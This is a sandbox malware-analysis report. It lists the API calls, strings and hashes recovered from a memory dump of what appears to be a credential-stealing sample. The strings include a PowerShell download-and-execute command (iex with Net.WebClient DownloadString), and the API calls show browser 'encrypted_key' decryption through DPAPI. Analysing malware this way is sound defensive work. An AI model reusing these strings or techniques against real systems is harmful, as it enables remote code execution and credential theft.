Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID: :t$:t
API String ID: 1378416451-3646547331
Opcode ID: 3ac8be224287e149a61ebdfa5d20399056cf12e1643528ba08768250a8da4cb7
Instruction ID: f5f33ad05f0b3c5091b8bee8f453e4813e2e8a5123759b2025bbf5bb3059894c
Opcode Fuzzy Hash: 3ac8be224287e149a61ebdfa5d20399056cf12e1643528ba08768250a8da4cb7
Instruction Fuzzy Hash: 80F04936F58208BBDB14DFB0DC49F9E77B9AB88721F10C254BA55A72C0D774AA419B40

Function 007440B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 007440D5
RegOpenKeyExA.ADVAPI32(80000001,00FD08F0,00000000,00020119,?), ref: 007440F4
RegQueryValueExA.ADVAPI32(?,00FCFE68,00000000,00000000,00000000,000000FF), ref: 00744118
RegCloseKey.ADVAPI32(?), ref: 00744122
lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00744147
lstrcatA.KERNEL32(?,00FCFE80), ref: 0074415B

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: 52814c7cad432dadd836a55db1b61fa9b659266cbd16dcf5bd9881d3d5a6f580
Instruction ID: c90f3ccf7efdc5107f545acb5b9392df3e629f02a51908e8ad69e3a794179a89
Opcode Fuzzy Hash: 52814c7cad432dadd836a55db1b61fa9b659266cbd16dcf5bd9881d3d5a6f580
Instruction Fuzzy Hash: F74148B7D10108ABDB14FBA0DC5AFFE737DAB88300F404558B62996181EA755BD88B92

Function 00743560 Relevance: 9.1, APIs: 6, Instructions: 122stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00743588

Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788

strtok_s.MSVCRT ref: 007436D1

Part of subcall function 0074A820: lstrlenA.KERNEL32(00000000,?,?,00745B54,00750ADB,00750ADA,?,?,00746B16,00000000,?,00FC1558,?,0075110C,?,00000000), ref: 0074A82B
Part of subcall function 0074A820: lstrcpy.KERNEL32(u,00000000), ref: 0074A885

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: lstrcpystrtok_s$lstrlen
String ID:
API String ID: 3184129880-0
Opcode ID: 7216dba6bcf4e067dd2aee51ae4f811538fe09a656b8ec84d88cc7198a24fb2d
Instruction ID: daa408d7789d9f9b8a0af3ab6b55a61c7a7cd1e0f99fab7c0e43fb4a130bdea0
Opcode Fuzzy Hash: 7216dba6bcf4e067dd2aee51ae4f811538fe09a656b8ec84d88cc7198a24fb2d
Instruction Fuzzy Hash: 9A413EB1D50109EFDB04EFA4D849AEEB778BF44304F108018F51A76291DB79AA09CFA6

Function 0074B38C Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 0074B39A

Part of subcall function 0074AFAC: __mtinitlocknum.LIBCMT ref: 0074AFC2
Part of subcall function 0074AFAC: __amsg_exit.LIBCMT ref: 0074AFCE
Part of subcall function 0074AFAC: EnterCriticalSection.KERNEL32(?,?,?,0074AC60,0000000E,0075A148,0000000C,0074AC2A,?,0074AC39), ref: 0074AFD6

DecodePointer.KERNEL32(0075A188,00000020,0074B4DD,?,00000001,00000000,?,0074B4FF,000000FF,?,0074AFD3,00000011,?,?,0074AC60,0000000E), ref: 0074B3D6
DecodePointer.KERNEL32(?,0074B4FF,000000FF,?,0074AFD3,00000011,?,?,0074AC60,0000000E,0075A148,0000000C,0074AC2A,?,0074AC39), ref: 0074B3E7

Part of subcall function 0074BE35: EncodePointer.KERNEL32(00000000,0074C063,007795B8,00000314,00000000,?,?,?,?,?,0074B707,007795B8,Microsoft Visual C++ Runtime Library,00012010), ref: 0074BE37

DecodePointer.KERNEL32(-00000004,?,0074B4FF,000000FF,?,0074AFD3,00000011,?,?,0074AC60,0000000E,0075A148,0000000C,0074AC2A,?,0074AC39), ref: 0074B40D
DecodePointer.KERNEL32(?,0074B4FF,000000FF,?,0074AFD3,00000011,?,?,0074AC60,0000000E,0075A148,0000000C,0074AC2A,?,0074AC39), ref: 0074B420
DecodePointer.KERNEL32(?,0074B4FF,000000FF,?,0074AFD3,00000011,?,?,0074AC60,0000000E,0075A148,0000000C,0074AC2A,?,0074AC39), ref: 0074B42A

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2005412495-0
Opcode ID: 34f9bb69a7595c29098a5a62da874f119cda08671de2c22481e2ff865c02ffb2
Instruction ID: edac2b74b90255bb928673cc1b48738489d71a01229fb069528d3ba6e1224f45
Opcode Fuzzy Hash: 34f9bb69a7595c29098a5a62da874f119cda08671de2c22481e2ff865c02ffb2
Instruction Fuzzy Hash: B1313B7090139ADFDF109FA9C88529DBBF0BF48310F14802AE514A62A2DBBD8C95DF15

Function 007399C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007399EC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 00739A11
LocalAlloc.KERNEL32(00000040,?), ref: 00739A31
ReadFile.KERNEL32(000000FF,?,00000000,007402E7,00000000), ref: 00739A5A
LocalFree.KERNEL32(007402E7), ref: 00739A90
CloseHandle.KERNEL32(000000FF), ref: 00739A9A

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 8d14aca08c535763c6def8b1a3d252e5bd8009c95286a5c0795b34be0159669c
Instruction ID: 989d94641bc933a0d4a66e92b136162bc6c8bdffad80b1ee5e0165d01a9dc33f
Opcode Fuzzy Hash: 8d14aca08c535763c6def8b1a3d252e5bd8009c95286a5c0795b34be0159669c
Instruction Fuzzy Hash: 19314D74A00209EFEB14DF94C885BEE77F5FF48301F108258E915A7290D778A981DFA1

Function 0074C9DE Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0074C9EA

Part of subcall function 0074BF9F: __getptd_noexit.LIBCMT ref: 0074BFA2
Part of subcall function 0074BF9F: __amsg_exit.LIBCMT ref: 0074BFAF

__amsg_exit.LIBCMT ref: 0074CA0A
__lock.LIBCMT ref: 0074CA1A
InterlockedDecrement.KERNEL32(?), ref: 0074CA37
free.MSVCRT ref: 0074CA4A
InterlockedIncrement.KERNEL32(0075B558), ref: 0074CA62

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
String ID:
API String ID: 634100517-0
Opcode ID: 9fcaee390ab64a9f492d6a9cfc8d030ebdae799d7d9b840d642cf031759f89f4
Instruction ID: 91b76b857525b96c0ce50ae0016bb518df1e84521b9030586b62086e407db3a3
Opcode Fuzzy Hash: 9fcaee390ab64a9f492d6a9cfc8d030ebdae799d7d9b840d642cf031759f89f4
Instruction Fuzzy Hash: E801C031A02719EBDB62EF68884A7AEB360BF00761F15C105F91067291CB6CAD40CBDA

Function 00746F00 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00746F1F
??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0074719A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 00746F4D

Part of subcall function 00746BD0: strlen.MSVCRT ref: 00746BE1
Part of subcall function 00746BD0: strlen.MSVCRT ref: 00746C05

VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 00746F92
??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0074719A), ref: 007470B3

Part of subcall function 00746DE0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00746DF8

Strings

@, xrefs: 00746FA6

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: strlen$MemoryProcessQueryReadVirtual
String ID: @
API String ID: 2950663791-2766056989
Opcode ID: 159788594354031db031e4b8e5a3ac0ef82e9670e16672737901d7db965a241b
Instruction ID: 0e99baf9cdeb2bf922111cf707f46e481f86981f1e730f2d136d5ae00881749f
Opcode Fuzzy Hash: 159788594354031db031e4b8e5a3ac0ef82e9670e16672737901d7db965a241b
Instruction Fuzzy Hash: 0F51F5B5E04109EFDB08CF98D981AAFB7B6FF88300F148559F915A7250D739AA11CBA1

Function 007369B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 155libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00736E2A), ref: 00736A19

Strings

*ns, xrefs: 00736B28, 00736BB6, 00736BBB, 00736B65
*ns, xrefs: 007369BD, 007369C9, 007369DC, 007369E5, 00736A09, 00736A32, 00736A35, 00736AEF, 00736B01, 00736B0D, 00736B16, 00736B93, 00736B49, 00736A4A, 00736A6D, 00736A79, 00736AA1, 00736AD1, 00736AE3, 00736AAD, 00736ABA, 00736A56

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: *ns$*ns
API String ID: 1029625771-1389744233
Opcode ID: 28049f066d8e040f4ed5164134ac2581122024f61d3f5d0604525be0069bf74f
Instruction ID: d3e2092aaf221a121d310440e6bb722e5841d01c6e9d07b62b76f19e30b4c125
Opcode Fuzzy Hash: 28049f066d8e040f4ed5164134ac2581122024f61d3f5d0604525be0069bf74f
Instruction Fuzzy Hash: 8571A874A00109EFDB04CF48C594BAAB7B2FB88355F24C169E9099F356D739AE85CF90

Function 00742C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788

Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12

Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
Part of subcall function 0074A920: lstrcatA.KERNEL32(00000000), ref: 0074A982

Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905

ShellExecuteEx.SHELL32(0000003C), ref: 00742D85

Strings

')", xrefs: 00742CB3
-nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00742CC4
<, xrefs: 00742D39
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00742D04

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 3031569214-898575020
Opcode ID: 35dcdc43cf975cc9a535d1d1999d3aba1f96acf232ba851d6a0d35e252397d2a
Instruction ID: 3cb536422bacb4f73bcb0e9cbc9ff35f50cc5eeff82084a86e9b04a7fa2b350f
Opcode Fuzzy Hash: 35dcdc43cf975cc9a535d1d1999d3aba1f96acf232ba851d6a0d35e252397d2a
Instruction Fuzzy Hash: F041F171D50208EAEB15FFA0C89ABEDB778EF14304F504029F416A7192DF782A4ACF91

Function 00740D90 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00740DB8
strtok_s.MSVCRT ref: 00740EFD

Part of subcall function 0074A820: lstrlenA.KERNEL32(00000000,?,?,00745B54,00750ADB,00750ADA,?,?,00746B16,00000000,?,00FC1558,?,0075110C,?,00000000), ref: 0074A82B
Part of subcall function 0074A820: lstrcpy.KERNEL32(u,00000000), ref: 0074A885

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: 4b8f8ef4bbb02537e2a08bec031a9cb7c9545b5d6695775640c24baec4593aab
Instruction ID: 859b19145a4cab68083e885f6012a14bfa7adefa07a9cde85955a1717be3dc3a
Opcode Fuzzy Hash: 4b8f8ef4bbb02537e2a08bec031a9cb7c9545b5d6695775640c24baec4593aab
Instruction Fuzzy Hash: CF518CB5A4420AEFCB08DF94D495AAE77B5FF48304F108469E902AB390D734EA95CFD1

Function 00739CE0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 97COMMON

Download Yara Rule

APIs

Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788

Part of subcall function 007399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007399EC
Part of subcall function 007399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00739A11
Part of subcall function 007399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00739A31
Part of subcall function 007399C0: ReadFile.KERNEL32(000000FF,?,00000000,007402E7,00000000), ref: 00739A5A
Part of subcall function 007399C0: LocalFree.KERNEL32(007402E7), ref: 00739A90
Part of subcall function 007399C0: CloseHandle.KERNEL32(000000FF), ref: 00739A9A

Part of subcall function 00748E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00748E52

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00739D39

Part of subcall function 00739AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ns,00000000,00000000), ref: 00739AEF
Part of subcall function 00739AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00734EEE,00000000,?), ref: 00739B01
Part of subcall function 00739AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ns,00000000,00000000), ref: 00739B2A
Part of subcall function 00739AC0: LocalFree.KERNEL32(?,?,?,?,00734EEE,00000000,?), ref: 00739B3F

memcmp.MSVCRT(?,DPAPI,00000005), ref: 00739D92

Part of subcall function 00739B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00739B84
Part of subcall function 00739B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00739BA3
Part of subcall function 00739B60: memcpy.MSVCRT(?,?,?), ref: 00739BC6
Part of subcall function 00739B60: LocalFree.KERNEL32(?), ref: 00739BD3

Strings

, xrefs: 00739DC1
"encrypted_key":", xrefs: 00739D30
DPAPI, xrefs: 00739D89

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 3731072634-738592651
Opcode ID: feb0062dd1aebe0321dd923372cfeb98395ec204548e2a7443d601045a8bdeae
Instruction ID: 89c10a49a42407b4d777f0f547886758394e30659d8c816b0c119b1f788c7976
Opcode Fuzzy Hash: feb0062dd1aebe0321dd923372cfeb98395ec204548e2a7443d601045a8bdeae
Instruction Fuzzy Hash: 8F3143B5E10109EBDF04DFE4DC86AEE77B8BF48305F144519EA05A7242E7789A04CBA1

Function 007487C0 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00750E28,00000000,?), ref: 0074882F
HeapAlloc.KERNEL32(00000000,?,?,?,?,00750E28,00000000,?), ref: 00748836
wsprintfA.USER32 ref: 00748850

Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788

Strings

Fs, xrefs: 00748804, 00748813
%dx%d, xrefs: 00748847

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
